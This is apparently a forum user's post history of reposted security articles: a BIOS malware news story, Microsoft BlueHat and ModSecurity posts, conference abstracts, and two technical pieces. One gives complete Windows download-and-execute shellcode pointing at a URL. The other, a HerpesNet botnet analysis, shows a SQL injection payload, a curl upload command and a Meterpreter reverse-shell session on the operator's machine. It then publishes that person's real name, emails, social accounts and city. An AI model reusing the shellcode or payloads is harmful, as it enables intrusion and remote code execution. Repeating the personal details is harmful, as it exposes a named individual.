-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Sa nu incepem si aici o discutie dinasta... Nu cred ca am vazut site impotriva USL. Internetul e (inca) al nostru, apolitic. PDL si USL, aceeasi mizerie!
-
[h=1]Meet 'Rakshasa,' The Malware Infection Designed To Be Undetectable And Incurable[/h]Via: Defcamp Andy Greenberg, Forbes Staff [h=6]7/26/2012 @ 12:50PM[/h] Malicious software, like all software, gets smarter all the time. In recent years it’s learned to destroy physical infrastructure, install itself through Microsoft updates, and use human beings as physical “data mules,” for instance. But researcher Jonathan Brossard has innovated a uniquely nasty coding trick: A strain of malware that’s nearly impossible to disinfect. At the Black Hat security conference in Las Vegas Thursday, Brossard plans to present a paper (PDF here) on “Rakshasa,” a piece of proof-of-concept malware that aims to be a “permanent backdoor” in a PC, one that’s very difficult to detect, and even harder to remove. Like some other tenacious malware strains, Rakshasa infects the computer’s BIOS, the part of a computer’s memory that boots its operating system and initializes other system components. But it also takes advantage of a potentially vulnerable aspect of traditional computer architecture: Any peripheral like a network card, CD-ROM, or sound card can write to the computer’s RAM or to the small portions of memory allocated to any of the other peripherals. So Brossard has given Rakshasa, whose name comes from that of a mythological Indian demon, the ability to infect all of them. And if the BIOS or network card is disinfected, for instance, it can be reinfected from any one of the other compromised components. In order to disinfect the computer, “you would need to flash all the devices simultaneously,” says Brossard, founder of the French security consultancy Toucan System. “It would be very difficult to do. The cost of recovery is probably higher than the cost of the laptop. It’s probably best to just get rid of the computer.” Rakshasa, which Brossard first suggested in a less-developed form at a Paris conference last spring, is built with open source, innocuous BIOS-modifying software like Core Boot and Sea BIOS. Brossard says that makes it compatible with more machines’ hardware than proprietary software would and also means that antivirus isn’t likely to detect it. It’s programmed to download all malicious code that it uses after the machine boots up–and after antivirus is disabled–in the form of a fake PDF file over an SSL-encrypted Wifi connection, and then store that code in memory rather than on the hard drive to avoid ever leaving a trace that might be caught by forensic analysis. Just how Rakshasa would infect a computer in the first place isn’t exactly Brossard’s focus. He posits that a Chinese manufacturer might install it before it ever reaches a customer’s hands, a real problem given the complex supply chains in most computers’ past. “The whole point of this research is to undetectably and untraceably backdoor the hardware,” he says. “What this shows is that it’s basically not practical to secure a PC at all, due to legacy architecture. Because computers go through so many hands before they’re delivered to you, there’s a serious concern that anyone could backdoor the computer without your knowledge.” A spokesperson for Intel, the company as close as any to being responsible for the architecture of modern PC hardware, says it’s reviewed Brossard’s paper, and dismisses it as “largely theoretical,” writing that “there is no new vulnerability that would allow the landing of the bootkit on the system.” The company’s statement argues that it wouldn’t be possible to infect the most recent Intel-based machines that require any changes to BIOS to be signed with a cryptographic code. and it points out that Brossard’s paper “assumes the attacker has either physical access to the system with a flash programmer or administrative rights to the system to deliver the malware. In other words, the system is already compromised with root/administrative level access. If this level of access was previously obtained, a malicious attacker would already have complete control over the system even before the delivery of this bootkit.” But Brossard argues that today only a small percentage of computers require code-signing in their BIOS. He admits that the attacker would need control of the computer before installing Rakshasa–not much comfort given his concern about manufacturers installing a piece of ultra-stealthy malware. And Intel’s claim that there is “no new vulnerability” exploited by Brossard’s work? He agrees. “It’s not a new vulnerability,” he says. “It’s a problem with the architecture that’s existed for 30 years. And that’s much worse.” Check out Brossard’s paper, which contains many other nasty malware tricks here, or below. Sursa: Meet 'Rakshasa,' The Malware Infection Designed To Be Undetectable And Incurable - Forbes
-
Download and Execute shellcode on Windows 7 Published by Bkav Editor at 4:59 pm under Security Research Recently, I need a shellcode to download and execute an .exe file on Windows 7 for my experiment. However, there is not such a shellcode available. Meanwhile, the download and execution shellcode generated by Metasploit Framework, currently, is unable to work on Windows 7, and the search on the Internet does not bring about desirable results. With reference to the shellcode of “SkyLined” and some other shellcodes from milw0rm.com, I wrote a shellcode at my own discretion. And this is the result I would like to share with you: shellcode[] = “\xEB\x50\x31\xF6\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E” “\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x67? “\xE3\xEC\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99? “\x02\x17\xC1\xCA\x04\xAE\x75\xF8\x3B\x54\x24\x04\xE0\xE4\x75\xCE” “\x8B\x53\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C” “\x97\xC3\x68\x8E\x48\x8B\x63\xE8\xA6\xFF\xFF\xFF\x66\xB8\x6C\x6C” “\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD5\x68\x83? “\x2B\x76\xF6\xE8\x8A\xFF\xFF\xFF\xEB\x21\x50\xFF\xD5\x68\xE7\xC4? “\xCC\x69\xE8\x7B\xFF\xFF\xFF\x50\x4C\x4C\x4C\x4C\xFF\xD5\x68\x77? “\xA6\x60\x2A\xE8\x6A\xFF\xFF\xFF\x50\xFF\xD5\x50\x68\x2E\x65\x78? “\x65\x68\x43\x3A\x5C\x78\x50\x50\x89\xE3\x80\xC3\x08\x53\xE8\xC7? “\xFF\xFF\xFFhttp://website.com/file.exe”; As can be seen, the URL is placed at the end of the shellcode. Download ASM source code The shellcode was successfully experimented on Windows 7, and perhaps it can also work on Windows 2000 and later versions. Le Manh Tung Senior Security Researcher Sursa: http://blog.bkav.com/en/download-and-execute-shellcode-on-windows-7/ Other: http://grey-corner.blogspot.ro/2010/10/download-and-execute-script-shellcode.html
-
Ce face, modifica "/proc/sys/kernel/randomize_va_space": sys_creat sys_write sys_close Dar nu stiu daca va merge: "/proc/sys/kernel/randomize_va_space: Permission denied".
-
Technical Analysis of the Top BlueHat Prize Submissions swiat 26 Jul 2012 9:55 PM Now that we have announced the winners of the first BlueHat Prize competition, we wanted to provide some technical details on the top entries and explain how we evaluated their submissions. Speaking on behalf of the judges, it was great to see people thinking creatively about defensive solutions to important security problems! To set the stage for this post, we thought it would be helpful to quickly remind everyone of the problem that entrants needed to solve. Specifically, entrants were required to design a novel runtime mitigation technology that would be capable of preventing the exploitation of memory safety vulnerabilities (such as buffer overruns). The BlueHat Prize judging panel was then responsible for evaluating each submission as describedaccording to the following criteria (as described in the contest rules): Practical and functional (30%) Can the solution be deployed at large scale? Does the prototype have low overhead? Is the prototype free of any application compatibility or usability regressions? Does the prototype function as intended? Robustness (30%) How easy would it be to bypass the proposed solution? [*]Impact (40%) Does the solution strongly address key open problems or significantly refine an existing approach? Would the solution strongly mitigate exploits above and beyond Microsoft’s current arsenal? The judges for this contest consisted of representatives from Windows, Microsoft Research, and Microsoft’s Security Engineering Center (MSEC). Of the 20 entries received, the top three submissions described different methods of mitigating return oriented programming (ROP). Let’s dive into the technical details of these submissions. [h=1]3rd place: mitigating ROP via return site whitelisting (/ROP)[/h] This entry, as submitted by Jared DeMott, described a method of imposing a whitelist on the set of locations that a return instruction can transfer control to. More specifically, this solution calls for the introduction of a new compiler flag (“/ROP”) that would add metadata to an executable that describes the set of valid return sites in the image. When the image is loaded at runtime by the operating system, the image’s list is added to a master list. As the program executes, each invocation of a return instruction triggers an exception that causes the operating system to validate the target return site against the master list of return sites. If the target return site is in the list, the program continues executing as normal; otherwise, the program is safely terminated. To prototype this idea, the submission included a Pin tool that simulated the hardware support that would be needed to augment the behavior of the return instruction. In addition, the prototype also included an IDA Python script to identify the set of valid return sites for an image. This script generated the input that was needed for the Pin tool to check whether a return target was to be considered valid. [h=2]Practical and functional[/h] Although this solution is functional, it is not seen as practical for large scale deployment as described. The primary reason for this is due to the execution cost associated with implementing this check. This cost is expected to be significant because the design calls for a software interrupt to be raised for each return instruction. A second issue with this design is related to the data structure that is used to store the address of valid return sites. In particular, the prototype of this design uses the STL map container which, although it enables O(1) lookups, is not optimally compact and can therefore lead to considerable memory overhead depending on the number valid return sites that exist in modules loaded by a process. The design for this solution did not propose optimizations that could help to address both of these concerns. [h=2]Robustness[/h] This solution is seen as a partial mitigation for ROP. It could be bypassed by leveraging gadgets that are in the set of valid return sites or by using a gadget chaining method that does not involve a return instruction. The feasibility of finding a sufficient set of gadgets in the set of valid return sites is expected to be uncommon. The use of alternative chaining methods is feasible, although the complexity associated with doing so exceeds the current state of the art in ROP-based exploits seen in the wild. [h=2]Impact[/h] This solution would have a moderate impact if were possible to deploy it at large scale. The fact that this solution does not fully address all forms of code re-use limits the expected long term impact of the design as described. [h=1]2nd place: mitigating ROP by placing new checks in critical functions (ROPGuard)[/h] This entry, as submitted by Ivan Fractic, described a method of mitigating ROP by introducing additional checks that are performed when critical functions, such as VirtualProtect, are called. These checks are designed to detect conditions that are indicative of ROP occurring, such as an API being called out of context. The checks proposed by this submission included: Verifying that the stack pointer is within the bounds of the thread’s stack. Verifying that that the return address of a critical function is executable and preceded by a call. Verifying that all stack frames are valid and satisfy criteria 1 and 2. Simulate execution forward from a critical function’s return address to verify that subsequent returns satisfy criteria #2. Function specific contract changes (e.g. prevent reprotecting of the stack as executable). Although adding checks to critical functions to detect ROP is not a new idea, and indeed some of the checks above have already been described in previous research, this submission included novel elements that we had not seen discussed before. We actually received a number of submissions which proposed adding new checks to critical functions, but the other submissions had a subset of the checks proposed by this submission or by previous research. [h=2]Practical and functional[/h] The checks proposed by this submission are considered to be both practical and functional. By limiting these checks to certain critical functions, the performance impact is minimized. Some of the proposed checks would be incompatible with certain applications. Specifically, criteria #1 is known to be incompatible with some legacy applications that do custom stack switching and #3 is incompatible with x86 programs that enable frame pointer omission. [h=2]Robustness[/h] ROP mitigations that rely on introducing new checks to critical functions are not considered to be robust over the long term. The checks proposed by this submission and in previous research are capable of mitigating ROP payloads that are used today, but it is expected that attackers would be able to adapt to these checks at relatively low cost. For example, a fundamental problem with this type of approach is that an attacker could attempt to call a lower level API that has not been instrumented by the checks. A variant of this bypass is to transfer control after the instruction block that performs the checks (depending on how the checks have been added). [h=2]Impact[/h] This solution would have a moderate impact if implemented correctly and deployed at large scale. The fact that this solution does not fundamentally address ROP limits the expected long term impact of the design as described. [h=1]1st place: mitigating ROP via Last Branch Recording (kBouncer)[/h] This entry, as submitted by Vasilis Pappas, described a novel method of using the Last Branch Recording (LBR) feature of Intel processors to detect ROP when system calls are made. This method relies on a kernel component that allows branch recording to be enabled for return control transfers. When a system call occurs, the kernel component then enumerates each entry in the LBR stack and verifies that the destination address is preceded by a call instruction. The prototype for this solution relied on evaluating the contents of the LBR when certain critical APIs were called rather than at the system call layer. The cited reason for this was due to Windows kernel restrictions around interposing the system call layer in kernel mode. [h=2]Practical and functional[/h] This solution is considered to be both practical and functional. The use of supported hardware features to track the destination address of return control transfers helps to drive down the performance cost and complexity of implementing this solution. There should also be minimal application compatibility impact through this approach. [h=2]Robustness[/h] This solution is not expected to be robust over the long term, although it should be robust against ROP payloads that are used today. There are multiple reasons why it is not expected to be robust. First and foremost, the Last Branch Recording feature of Intel processors has a limited stack for storing control transfers (16 entries on Nahelam and up). If an attacker can ensure that a sufficient number of valid returns happen between the control transfer that eventually leads to an API call and the point where the LBR stack is checked, then this solution can be bypassed. It is believed that attackers would be able to accomplish this in most cases with a low to moderate development cost. While it may be possible to use the Branch Trace Store (BTS) feature to help address this problem, the performance cost may become unacceptable. The other reasons for this solution not being robust are shared with the two previous submissions: specifically, imposing these checks on specific APIs (as in the prototype) may be prone to bypasses and imposing checks only on returns does not mitigate all methods of chaining gadgets. [h=2]Impact[/h] This solution would have a moderate impact if implemented correctly and deployed at large scale. The fact that this solution does not fundamentally address ROP limits the expected long term impact of the design as described. [h=1]Closing thoughts[/h] The winning submissions illustrate some of the creative thinking that has gone into developing defensive methods of making it more difficult and costly to exploit memory safety vulnerabilities. As we look toward the future, we will investigate whether there are elements of these methods that may make sense to integrate into EMET or a future version of our products. We have already taken steps in this direction by integrating features from the ROPGuard submission and related prior research into the Technical Preview of EMET 3.5. As the judging criteria makes it clear, it can be quite challenging to turn an interesting defensive security idea into something that can be shipped in a retail product at large scale. Nevertheless, ideas that may seem impractical on the surface can eventually be turned into an innovative and practical solution – it just takes some additional focused thinking. Matt Miller MSEC Security Science Sursa: Technical Analysis of the Top BlueHat Prize Submissions - Security Research & Defense - Site Home - TechNet Blogs
-
[h=3]Announcing the availability of ModSecurity extension for IIS[/h]swiat 26 Jul 2012 10:44 AM Vulnerabilities in on-line services, like cross-site scripting, cross-site request forgery, or even information disclosure, are important areas of focus for the Microsoft Security Response Center (MSRC). Over the last few years Microsoft has developed a number of tools capable of mitigating selected web specific vulnerabilities (for example, UrlScan). To help on this front we have participated in a community effort to bring the popular open source module ModSecurity to the IIS platform. Yesterday at Black Hat Las Vegas, we have announced the availability of an RC version and we expect that stable release will be available soon. [h=1]Installation[/h] Although the source code of ModSecurity’s IIS components is fully published and the binary building process is publicly described (see mod_security/iis/winbuild/howto.txt in SourceForge repository), it is highly not recommended to self-build the module for non-research or non-development purpose. A standard MSI installer of ModSecurity for IIS 7 and later versions is available from SourceForge files repository of ModSecurity project and in the future designated maintainers will be keeping it updated with latest patches and minor versions of the module. [h=1]Configuration[/h] The IIS installer does not interfere with currently running web applications. This means that the installation process must be followed by an application pool restart or recycling in order to load the new module into the application pool process. For the RC version of the module the restart/recycle step is also highly recommended each time a ModSecurity configuration file has been changed: After successful load of the module into the application pool process a series of informational events is recorded in the application event log: Runtime messages and notifications generated during the operational phase, both coming from the user-defined rules and system specific events or errors, are sent to the same application event log repository. To apply a ModSecurity configuration file to a web application or a path, one has to use IIS configuration schema extension, like in the example below: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <ModSecurity enabled="true" configFile="c:\inetpub\wwwroot\test.conf" /> </system.webServer> </configuration> The c:\inetpub\wwwroot\test.conf config file is a regular ModSecurity configuration containing the same directives as used on the Apache web server. [h=1]Examples of Protection[/h] The most common application of ModSecurity is a protection layer called “virtual patching” (see Resources section, [5]). Using two recent vulnerabilities as an example we would like to show how this layer can be specified in an environment with IIS server running with ModSecurity. CVE-2011-3414 In December 2011 a vulnerability was addressed in ASP.NET that allowed attackers to cause excessive processor load on most ASP.NET web applications. The hash collision issue required attacker to send a large (typically 1MB or 4MB) POST request to the server, with tens of thousands of arguments with specially crafted names. There are at least four ways to mitigate this kind of attack: Restrict the request body size. Restrict the number of arguments. Identify repetitive payloads. Check arguments names against PoC data. The approach of checking for the presence of repetitive payload is the most sophisticated one and it can be implemented in ModSecurity using the following chain of rules: SecRule &ARGS "@ge 1000" "chain,id:1234,phase:2,t:none,deny,msg:'Possible Hash DoS Attack Identified.',tag:'http://blogs.technet.com/b/srd/archive/2011/12/27/more?information?about?the?december?2011?asp?net?vulnerability.aspx?Redirected=true'" SecRule REQUEST_BODY "^\w*?=(.*?)&\w*?=(.*?)&\w*?=(.*?)&\w*?=(.*?)&" "chain,capture" SecRule TX:1 "@streq %{tx.2}" "chain,setvar:tx.hash_dos_match=+1" SecRule TX:2 "@streq %{tx.3}" "chain,setvar:tx.hash_dos_match=+1" SecRule TX:3 "@streq %{tx.4}" "chain,setvar:tx.hash_dos_match=+1" SecRule TX:HASH_DOS_MATCH "@eq 3" When this rule is loaded into an IIS server configuration and the attack is launched on the protected path, the Windows application event log will record an access denied message from ModSecurity: At the same time the attacker will see HTTP response 403, stopping the attack before it reaches ASP.NET vulnerable component. CVE-2012-1859 In July 2012, Microsoft patched a classic case of reflected cross-site scripting vulnerability in Microsoft SharePoint 2010. For the attacks to exploit the vulnerability it was enough to trick user into clicking on a malicious URL, like the one below: http://sharepoint/_layouts/scriptresx.ashx?culture=en?us&name=SP.JSGrid.Res&rev=laygpE0lqaosnkB4iqx6mA%3D%3D§ions=All<script>alert(‘Hacked!!!’)</script>z The script injected by the attacker could gain access to the entire data set available to the victim through the hacked SharePoint server. One possible way to block this attack is a whitelist approach: let the URL with sections argument that does contain only valid characters pass through, while block all other URLs. Below is a ModSecurity rule implementing this approach for alphanumeric characters: SecRule REQUEST_FILENAME "@contains /_layouts/scriptresx.ashx" "chain,phase:1,block,msg:'SharePoint Sections Param Violation - Illegal Chars" SecRule ARGS:sections "!@rx ^\w+$" The rule included through ModSecurity config file into the SharePoint web.config file, generates the following event when any invalid character (indicating possible attack attempt) is discovered in the corresponding SharePoint URL: [h=1]Feedback[/h] We encourage you to download and try out the tool. If you have any feedback on your experiences with the tool, you can reach us at switech@microsoft.com. [h=1]Acknowledgments[/h] The following people have contributed to the multi-platform effort of ModSecurity: Microsoft – ModSecurity Port for IIS Greg Wroblewski – Senior Security Developer Suha Can – Security Researcher / Developer [*] Trustwave - ModSecurity Ziv Mador – Director of Security Research Ryan Barnett – Security Researcher Lead Breno Pinto – ModSecurity Researcher & Developer [*] Open community - Security Port for Nginx Alan Silva - Software Engineer at Alcatel-Lucent We would like to thank: Wade Hilmo and Nazim Lala, members of the Microsoft’s IIS team , for their support and help in solving many technical problems. [h=1]Resources[/h] [1] ModSecurity home page: http://www.modsecurity.org/ [2] OWASP Core Rule Set for ModSecurity: https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project [3] http://blog.modsecurity.org/files/enough_with_default_allow_r1_draft.pdf [4] http://www.modsecurity.org/documentation/Securing_Web_Services_with_ModSecurity_2.0.pdf [5] https://www.blackhat.com/presentations/bh-dc-09/Barnett/BlackHat-DC-09-Barnett-WAF-Patching-Challenge-Whitepaper.pdf - Greg Wroblewski, Microsoft Security Engineering Center - Ryan Barnett, Trustwave Sursa: Announcing the availability of ModSecurity extension for IIS - Security Research & Defense - Site Home - TechNet Blogs
-
[h=2]Apple tot o curva ramane.[/h] Published on July 26, 2012 by Razvan in Stiri ?i am dreptate când spun asta. Dup? cum ?ti?i Apple ?i Samsung duc o lupt? a patentelor pe tot globul, mai r?mâne s? se judece ?i în România. Ca s? în?eleag? toat? lumea: Apple folose?te patente Samsung ?i Samsung folose?te patente Apple. Doar c? Apple, a?a ca o curv? cum este, a decis s? creasc? suma pe care compania Sud-coreean? trebuie s? o pl?teasc? pentru produs de la 2.09$ la 24$. Asta dup? ce le-a transmis celor de la Samsung c? patentele lor nu valoreaz? nimic, oferindu-le 0.0049$ per patent. Adic?, dac? Apple o s? vând? 30 de milioane de telefoane anul acesta, Samsung o s? câ?tige doar 147.000$, pe de alt? parte ar trebui s? pl?teasc? celor de la Apple câteva miliarde de dolari. Pare corect, nu? Am în?eles c? judec?torul englez i-a umilit în cel mai scârbos mod posibil, dar s? reac?ionezi în disperare ?i într-un mod ?ig?nesc, este de cel mai jos nivel posibil. Dac? pân? acum aveam o problem? doar cu pre?ul ridicat al produselor Apple, asta pentru ce pot s? fac?, acum am o scârb? fa?? de aceast? companie ?i metodele ei. Sursa: Apple tot o curva ramane.
-
Am reparat memberslist-ul: https://rstcenter.com/forum/memberlist.rst Hai ca nu a trecut asa mult de cand nu mergea... Edit: Merge si calendarul pana in 2015 acum, aici gj vBulletin...
-
[h=1]Analysis & pownage of herpesnet botnet[/h] Analysis & pownage of herpesnet botnet Introduction Tools Static analysis C&C contact Pown the C&C Pown the C&C - part 2 C&C interface Botnet owner tracing [h=2]Introduction[/h]We received a new sample from our submit mecanism. This sample is a botnet HTTP client called HerpesNet. The md5 of the sample is db6779d497cb5e22697106e26eebfaa8. We started the analysis when we found a way to manage the command & control... [h=2]Tools[/h] IDA 5.0 free The idb of file are available: (db6779d497cb5e22697106e26eebfaa8.idb). sqlmap. your favorite browser [h=2]Static analysis[/h]We start by opening the binary with IDA. We see directly that the file is not packed. We follow the Win_Main function and at offset 004071E0h we can see a call on 004070E0h (initThread) The initTread function are in charge to decode strings, open a mutex with the name "rffggghooo" and run 3 threads 004034F5h (thrInstallReg) with the parameter at offset 0041CE88h ("tcerfhygy") is in charge to loops indefinitly and set the the regkey 'Software\Microsoft\Windows\CurrentVersion\Run' with the name "rffggghooo" to enable the boot persistance (it does that every 100ms) 00402F70h (thrKeylogger) that in charge of set the keyboard hook with the help of GetAsyncKeyState 00406AF0h (thrContactCC) that in charge to loads system informations and check the C&C every 15s [h=3]Decode strings[/h]00406FC0h (initVariable) is in charge to decode all obsfucated string 00403034h (decode) is in charge to decode strings we do a python script to recover all strings #!/usr/bin/env python import sys def decode(src): r = "" for c in src: c = ord(c) if c < 0x61 or c > 0x7a : if c < 0x41 or c > 0x5a: r += chr(c) continue x = (( c - 0x41 ) % 0x1a) + 0x41 else: x = ((c - 0x54) % 0x1a) + 0x61 r += chr(x) return r def main(): if len(sys.argv) != 2: sys.exit(1) f = open(sys.argv[1], 'rb') f.seek(0x1ae88, 0) data = f.read(0x32f) for d in data.split("\0"): if len(d) == 0: continue print "%s : %s" % (d, decode(d)) if __name__ == "__main__": main() y0ug@malware.lu:~/malware/herpes$ python decode-all.py db6779d497cb5e22697106e26eebfaa8 tcerfhygy : gpresultl 3.0 : 3.0 uggc://qq.mrebkpbqr.arg/urecarg/ : http://dd.zeroxcode.net/herpnet/ 74978o6rpp6p19836n17n3p2pq0840o0 : 74978b6ecc6c19836a17a3c2cd0840b0 uggc://jjj.mrebkpbqr.arg/urecarg/ : http://www.zeroxcode.net/herpnet/ sgc.mrebkpbqr.arg : ftp.zeroxcode.net uggc://sex7.zvar.ah/urecarg/ : http://frk7.mine.nu/herpnet/ hcybnq@mrebkpbqr.arg : upload@zeroxcode.net hccvg : uppit ujsdsdbbngfgjhhuugfgfujd : hwfqfqooatstwuuhhtstshwq rffggghooo : esstttubbb Ashfurncsmx : Afusheapfzk [h=2]C&C contact[/h]The function in charge to build the request when it checks the C&C is 004059E0h (buildRerqd) It build the POST data with the information obtained above to make something like that: userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724After that it concat the url adding "run.php" add the end of the url passed in parameter 00403E57h are in charge to do the http request. By the way it set the useragent with the value 74978b6ecc6c19836a17a3c2cd0840b0 (is the deofuscated value) After it mades the request it call 00405F80h (parseCommand) that manages to execute command received from the C&C (I'm not going to detail command here you can look directly in the idb) Another interesting function is 0040391Fh (fileUpload) thats upload files by POST methods with the variable name "upfile" can be played directly with curl y0ug@malware.lu:~/malware/herpes$ curl -F upfile=@test.jpg -A 74978b6ecc6c19836a17a3c2cd0840b0 zeroxcode.net File caricato correttamente[h=2]Pown the C&C[/h]We are curious about how the C&C are coded so we decide to test some injection SQL on the C&C api especially the zeroxcode.net. With sqlmap we manage to exploit a time-based sqli. Place: POST Parameter: id Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724' AND SLEEP(5) AND 'PtaQ'='PtaQ --- [08:22:41] [iNFO] the back-end DBMS is MySQL web server operating system: Windows 2008 web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10 back-end DBMS: MySQL 5.0.11We extract tables names from the database Database: herpnet [7 tables] +----------+ | clients | | clinfo | | commands | | htickets | | husers | | paypalt | | uploads | +----------+And tada we get the user credential of the malware author +--------------------------------------------+ |id|username|password | |--------------------------------------------| | 1| Frk7|6e6bc4e49dd477ebc98ef4046c067b5f| +--------------------------------------------+With google we get the password 6e6bc4e49dd477ebc98ef4046c067b5f:ciaoThat is a master crime genious password We found a path disclosure that can be trigger with curl for exemple y0ug@malware.lu:~/malware/herpes$ curl zeroxcode.net <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL C:\inetpub\zeroxcode\herpnet\run.php/ was not found on this server.</p> <hr> <address> Server at zeroxcode.net Port 80</address> </body></html>[h=2]Pown the C&C - part 2[/h]We saw that the developer use a machine called Frk7Test@FRK7TEST-D6E0BD. So we upload a meterpreter to have a shell on the machine (whith the feature provide by Frk7 himself). msf exploit(handler) > exploit [* ]Started reverse handler on 94.21.200.63:4444 [*] Starting the payload handler... [*] Sending stage (752128 bytes) to 151.63.47.177 [*] Meterpreter session 1 opened (94.21.200.63:4444 -> 151.63.47.177:53574) at Mon May 21 16:20:04 +0200 2012 meterpreter > screenshot Screenshot saved to: /home/y0ug/src/msf3/PtPVDrKD.jpeg meterpreter > sysinfo System Language : it_IT OS : Windows XP (Build 2600, Service Pack3). Computer : FRK7TEST-D6E0BD Architecture : x86 Meterpreter : x86/win32 meterpreter > meterpreter > ls Listing: C:\Documents and Settings\Frk7Test\Desktop\Herpes4Un ============================================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Mon May 21 15:26:37 +0200 2012 . 40777/rwxrwxrwx 0 dir Mon May 21 15:37:07 +0200 2012 .. 40777/rwxrwxrwx 0 dir Mon May 21 14:53:32 +0200 2012 Debug 40777/rwxrwxrwx 0 dir Mon May 21 16:06:41 +0200 2012 Herpes 100666/rw-rw-rw- 890 fil Mon May 07 20:42:22 +0200 2012 Herpes.sln 100666/rw-rw-rw- 167424 fil Mon May 21 16:14:06 +0200 2012 Herpes.suo 40777/rwxrwxrwx 0 dir Mon May 21 16:15:12 +0200 2012 Release 100777/rwxrwxrwx 134 fil Mon May 07 20:42:12 +0200 2012 clean.bat 100666/rw-rw-rw- 134 fil Mon May 07 20:42:22 +0200 2012 roba da fare.txt meterpreter > download -r Herpes ./ [*] downloading: Herpes\antidebug.h -> .//antidebug.h [*] downloaded : Herpes\antidebug.h -> .//antidebug.h [*] mirroring : Herpes\base64 -> .//base64 [*] downloading: Herpes\base64\base64.c -> .//base64/base64.c [*] downloaded : Herpes\base64\base64.c -> .//base64/base64.c [*] downloading: Herpes\base64\base64.h -> .//base64/base64.h [*] downloaded : Herpes\base64\base64.h -> .//base64/base64.h [*] mirrored : Herpes\base64 -> .//base64 [*] mirroring : Herpes\cadt -> .//cadt [*] downloading: Herpes\cadt\cadtdll.lib -> .//cadt/cadtdll.lib [*] downloaded : Herpes\cadt\cadtdll.lib -> .//cadt/cadtdll.lib [*] downloading: Herpes\cadt\cadtlib.h -> .//cadt/cadtlib.h [*] downloaded : Herpes\cadt\cadtlib.h -> .//cadt/cadtlib.h ... The part of file that we are able to download before frk7 shutdown his machine (and web site) here. And a screenshot of the machine: [h=2]C&C interface[/h]First the login page: Secondly, the panel page (connected with frk7 account - see on left-top): The tasks page: List of command available: Information about an infected machine (in this case the test machine of frk7 - yes we see you!!) [h=2]Botnet owner tracing[/h]We made some research to understand who manage this botnet. First his pseudo: frk7 or siliceous Secondly his real name: Francesco Pompo We identified several mail: frk7@live.it frk7@live.com francesco.pompo@gmail.com siliceous@live.com Skype account: nobbosterminator Facebook page: http://www.facebook.com/Frk7.face Picasa page: https://picasaweb.google.com/101402927290625732642/ProfilePhotos His girlfriend: https://picasaweb.google.com/101402927290625732642/ProfilePhotos#5654185571837906082 Twitter account: https://twitter.com/#!/frk7tweet Another repository: http://frk7.altervista.org/ And finaly, he lives in Trapani (Italia). It amazing that a botnet manager puts as much information about his private life !! It's so crazy that we wonder if this botnet is not a honeypot of the Italian police !! Sursa: en_analyse_herpnet - malware-lu - Malware.lu technical analysis - Google Project Hosting
-
Comprehensive Experimental Analyses of Automotive Attack Surfaces Stephen Checkoway, Damon McCoy, Brian Kantor, Danny Anderson, Hovav Shacham, and Stefan Savage University of California, San Diego Karl Koscher, Alexei Czeskis, Franziska Roesner, and Tadayoshi Kohno University of Washington Abstract Modern automobiles are pervasively computerized, and hence potentially vulnerable to attack. However, while previous research has shown that the internal networks within some modern cars are insecure, the associated threat model—requiring prior physical access—has justifiably been viewed as unrealistic. Thus, it remains an open question if automobiles can also be susceptible to remote compromise. Our work seeks to put this question to rest by systematically analyzing the external attack surface of a modern automobile. We discover that remote exploitation is feasible via a broad range of attack vectors (including mechanics tools, CD players, Bluetooth and cellular radio), and further, that wireless communications channels allow long distance vehicle control, location tracking, in-cabin audio exfiltration and theft. Finally, we discuss the structural characteristics of the automotive ecosystem that give rise to such problems and highlight the practical challenges in mitigating them. Download: http://www.autosec.org/pubs/cars-usenixsec2011.pdf
-
[h=1]Injecting custom payload into signed Windows executables[/h] Analysis of the CVE-2012-0151 vulnerability A valid signature of a PE executable file doesn't always guarantee that the file hasn't been tampered with. The talk will explain the problem, show the vulnerable targets as well as their possible modifications, and discuss available fixes. Digital signing of executable modules has become a de facto standard in mainstream software products on Microsoft Windows. A file's digital signature confirms that the file has really been created by the signer and its content has not been tampered with by any third party. The signature implies a certain level of trust - if you trust the company that created the file, you trust the file itself. However, we discovered a way to modify certain classes of signed executables while keeping their digital signatures valid. It means that we can take a trusted signed application and inject our own payload that gets executed or installed when this application is run; this modified executable is still correctly signed by the original signer. We have reported this vulnerability to Microsoft (CVE-2012-0151) and they have released a fix in April 2012. However, since the issue is not just a bug in Windows code, but also a design feature combined with bugs in third-party applications, the fix does not cover 100% of possible cases. In my talk, I would like to present the technical aspects of the problem. I will describe how a signed executable can be modified, what the suitable/vulnerable candidates are, and what the released hotfix actually does. I will offer some advice for software developers on how to avoid creating applications which are vulnerable to this type of attack. [h=2]Attached files[/h] Slides (application/octet-stream - 3.7 MB) [h=2]Links[/h] http://blog.avast.com/2012/04/12/beware-of-a-new-windows-security-vulnerability-ms12-024/ Sursa: Recon2012: Injecting custom payload into signed Windows executables
-
The Case for Semantics-Based Methods in Reverse Engineering © Rolf Rolles, Funemployed RECON 2012 Keynote The Point of This Keynote ? Demonstrate the utility of academic program analysis towards solving real-world reverse engineering problems Definitions ? Syntactic methods consider only the encoding rather than the meaning of a given object, e.g., sequences of machine-code bytes or assembly language instructions, perhaps with wildcards ? Semantic methods consider the meaning of the object, e.g., the effects of one or more instructions Download: http://recon.cx/2012/schedule/attachments/52_semantics-based-methods.pdf
-
